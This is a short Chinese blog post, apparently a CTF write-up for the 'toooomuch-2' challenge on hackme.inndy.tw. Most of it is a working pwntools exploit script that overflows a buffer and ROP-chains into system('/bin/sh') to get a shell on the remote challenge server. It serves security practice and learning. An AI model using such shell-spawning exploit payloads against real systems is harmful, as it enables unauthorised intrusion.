toooomuch-2

这题要getshell,还有system函数,strcpy会将输入的字符写到bss段,所以直接rop到system从而getshell(system函数的参数是'/bin/sh'的地址)

from pwn import *

#p = process('./toooomuch-2')
p = remote('hackme.inndy.tw',7702)
p.recvuntil('passcode: ')
system_plt = 0x080484c0
payload = '/bin/sh\x00' + 'a'*0x10 + 'aaaa'
payload += p32(system_plt) + p32(0x080487D9) + p32(0x08049C60)
#gdb.attach(p)
p.sendline(payload)

p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 一、Python简介和环境搭建以及pip的安装 4课时实验课主要内容 【Python简介】: Python 是一个...
    _小老虎_阅读 11,300评论 0 10
  • Return-Oriented-Programming(ROP FTW) Author: Saif El-Sher...
    RealSys阅读 8,731评论 0 2
  • 今天羽菲开学了,这个小长假终于结束了,家里安静了许多。闲来没事我去贸易城给羽菲买了双小白鞋,放学回来后我还没告诉她...
    羽菲傲霖阅读 1,198评论 0 0
  • 1.感谢婆婆之前买的牛奶,今天用来做木瓜牛奶了。 2.下午热木瓜牛奶的时候,人没在边上看着,牛奶加热后溢满地,好在...
    安哈0130阅读 952评论 0 0

友情链接更多精彩内容